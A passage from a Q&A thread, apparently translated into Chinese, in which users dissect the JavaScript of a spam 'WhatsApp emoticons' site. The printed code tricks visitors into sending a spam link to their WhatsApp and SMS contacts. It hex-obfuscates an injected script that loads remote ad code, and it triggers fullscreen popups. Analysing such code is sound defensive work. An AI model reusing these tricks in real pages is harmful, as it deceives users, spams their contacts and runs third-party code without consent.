恶意网站:解密代码

Malicious website: decyphering the code?


有一个恶意网站试图通过垃圾邮件进一步传播自己,并且还会弹出广告——我建议启用 noscript 后再打开:
http://trucchiios.com/emoticon/index_en.php
我已经拿到了按下那个大的 WhatsApp 按钮时执行的代码,但它到底做了什么?

c = 0;      // implicit global: click counter shared by fn1, fn3 and fn2 below
var image;  // declared but never used in the code shown here
function fn1(x)
{
    // Handler for the big "WhatsApp" button (x is unused).
    // Every press bumps the shared global counter c; what happens next
    // depends on how many times the visitor has already pressed it.
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // Mobile user agents only; desktop visitors just get the alert below.
        ++c;
        if (c <= 6)
        {
            // Presses 1-6: hand a pre-written message containing the link
            // http://xy7.co/emoticon to the WhatsApp share intent, in the
            // current window.
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            // Share milestones are reported through ga() — presumably the
            // Google Analytics global; it is not defined in this snippet.
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            // Presses 7-10: the same share intent again ...
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            // ... plus an external ad script injected into <head>. The array
            // holds hex-escaped strings; as pasted the page shows `'x73`
            // where `\x73` was meant. Decoded it reads:
            //   ["script", "createElement", "type", "text/javascript", "src",
            //    "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]",
            //    "appendChild"]
            var head = document.getElementsByTagName('head').item(0);
            var _0xc631 = ["'x73'x63'x72'x69'x70'x74", "'x63'x72'x65'x61'x74'x65'x45'x6C'x65'x6D'x65'x6E'x74", "'x74'x79'x70'x65", "'x74'x65'x78'x74'x2F'x6A'x61'x76'x61'x73'x63'x72'x69'x70'x74", "'x73'x72'x63", "'x68'x74'x74'x70'x3A'x2F'x2F'x61'x64'x73'x2E'x73'x70'x72'x69'x6E'x74'x72'x61'x64'x65'x2E'x63'x6F'x6D'x2F'x61'x64'x73'x63'x72'x69'x70'x74'x2E'x70'x68'x70'x3F'x70'x69'x64'x3D'x38'x36'x37'x33'x26'x6F'x72'x64'x3D'x5B'x74'x69'x6D'x65'x73'x74'x61'x6D'x70'x5D", "'x61'x70'x70'x65'x6E'x64'x43'x68'x69'x6C'x64"];
            var script = document[_0xc631[1]](_0xc631[0]);  // document.createElement("script")
            script[_0xc631[2]] = _0xc631[3];                 // script.type = "text/javascript"
            script[_0xc631[4]] = _0xc631[5];                 // script.src = "http://ads.sprintrade.com/adscript.php?..."
            head[_0xc631[6]](script);                        // head.appendChild(script)
        } else
            // Press 11 onwards: no more sharing, just open the ad frame.
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}
function fn3(x) {
    // Handler for the SMS variant of the share button (x is unused).
    // Uses the same global counter c as fn1, so presses on either button
    // add up.
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // Mobile user agents only; desktop visitors just get the alert below.
        ++c;
        if (c <= 10) {
            // Presses 1-10: open the SMS composer, in the current window,
            // pre-filled with the same message and link as the WhatsApp one.
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            // Press 11 onwards: open the ad frame instead.
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}
function fn2(x) {
    // Gate on the shared counter c (x is unused); presumably wired to the
    // "activate" button. Once c reaches 10 the "reward" is only the ad
    // frame; below that, the alert nags the visitor to keep inviting,
    // which is what drives the sharing in fn1/fn3.
    if (c >= 10)
    {
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
var n = 300,
    t = setInterval(function() {
        // Once a second, write the countdown into #countdown via jQuery.
        // n-- is a post-decrement, so the element shows 300 ... 0 and n
        // becomes -1 on the tick after "0"; at that point the current window
        // is sent to the ad frame and the timer is cleared. The bitwise `&`
        // is used only to evaluate both calls in one expression.
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);

我只想有人告诉我它的作用。我怀疑这只是一个adspam,而不是真正的恶意软件,但请查看一下。

这段代码似乎就是上周收到的垃圾邮件不断增多的原因。我很确定这段代码是利用 WhatsApp 网络向联系人发送指向该恶意网站的链接:

window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");

如果使用移动设备,

if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {

还尝试发送短信:

"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");

执行这段代码时,还会加载其他一些插件站点。它似乎还会执行其他一些任务,但很难确定。该脚本是用 JavaScript 编写的。

它添加了javascript文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]

完整代码:

// The same injection as in fn1 above, with the hex-escaped strings decoded so
// the property names are readable.
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]    
var script = document[_0xc631[1]](_0xc631[0]);  // document.createElement("script")
script[_0xc631[2]] = _0xc631[3];                 // script.type = "text/javascript"
script[_0xc631[4]] = _0xc631[5];                 // script.src = "http://ads.sprintrade.com/adscript.php?..."
head[_0xc631[6]](script);                        // head.appendChild(script)

"正常"代码:

// Deobfuscated form: create a <script> element pointing at the ad server and
// append it to <head>, i.e. load and run third-party code at page runtime.
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);

页面 .../adscript.php?pid=8673&ord=[timestamp] 使用了缓存头,因此只会显示一次。首次访问时,你会得到:

 // Response body of adscript.php?pid=8673&ord=[timestamp] on first view.
 // It keeps, per document, an exclusion list (document.asm_excl) and a
 // counter for placement 2398 (document.asm_max_2398) so that the popup
 // loader below is installed only once.
 if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
 else{ document.asm_max_2398++; }
 var asm_ex = false;     // placement 2398 explicitly excluded?
 var asm_ex_all = false; // whole site (w21272) or publisher (p8673) excluded?
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
 if(asm_ex_all){} // excluded entirely: do nothing
 else if(!asm_ex  && document.asm_max_2398 <= 1)
 {
   // First impression of this placement: load the popup helper.
   document.write(''); 
(function ()
 {
  var s, r, t;
  r = false; // set to true once the popup is constructed; not read in this snippet
  s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
  s.readySet = false;
  // Run the callback exactly once, whichever of onload / onreadystatechange
  // (older IE) fires first; readySet is the guard.
  s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
  s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
  function asm_pop_asmfls8673x5396511y1447611443()
  {
   r = true;
   // Popup configuration handed to asm_popup(), which comes from the external
   // asmpop_async.js and is not shown here. The popup target is adpop.php on
   // ads.sprintrade.com; the window is requested at 1920x1080 at offset
   // (0,0) with fullscreen=1 and no location bar, menubar or toolbar. The
   // meaning of the remaining flags (clickpop, booLoad, loadTime, ...) is
   // defined by that loader — not visible from this listing.
   var asm_pop_options = new Object()
   asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
   asm_pop_options.breite = "1920";
   asm_pop_options.hoehe = "1080";
   asm_pop_options.links = "0";
   asm_pop_options.oben = "0";
   asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
   asm_pop_options.layeronly = false;
   asm_pop_options.popunder = false;
   asm_pop_options.canlayer = false;
   asm_pop_options.clickpop = true;
   asm_pop_options.close = "0";
   asm_pop_options.booLoad = true;
   asm_pop_options.loadTime = "2";
   asm_pop_options.closeTime = "0";
   asm_pop_options.cookdom = "sprintrade.com";
   asm_pop_options.poptitle = "";
   asm_pop_options.popdomain = "http://cdn.adspirit.de";
   asm_pop_options.kid = "2398";
   asm_pop_options.pid = "8673";
   asm_pop_options.id = "asmfls8673x5396511y1447611443";
   window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
  }
  // Insert the loader right after the last <script> on the page, falling
  // back to the end of <body>.
  var ss = document.getElementsByTagName("script");
  if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
  else if(document.body){document.body.appendChild(s);}
 })()
   document.write(''); 
 }
 else
 {
  // Placement excluded or already shown: document.write a further
  // adscript.php request with ex=|2398 so this placement is skipped,
  // cache-busted with the current time. As pasted the string looks
  // mangled: `text'/javasc` and `<'/scr'` were presumably `text\/javasc`
  // and `<\/scr'` (escaped slashes).
  document.write('<scr'+'ipt type="text'/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><'/scr'+'ipt>');
 }

之后再访问时得到的是:

 document.write(''); 

脚本被设置为只运行一次

语言是Javascript。

这些链接与mailto:链接(它调用电子邮件的默认应用程序)几乎相同,但在这种情况下,它调用默认的WhatsApp应用程序或SMS应用程序(取决于操作系统),然后发送广告。

(%0D%0A 是 CRLF 换行符的 URL 转义编码)


但话说回来,如果你说这是一个很大的"WhatsApp"按钮,你希望它能做什么?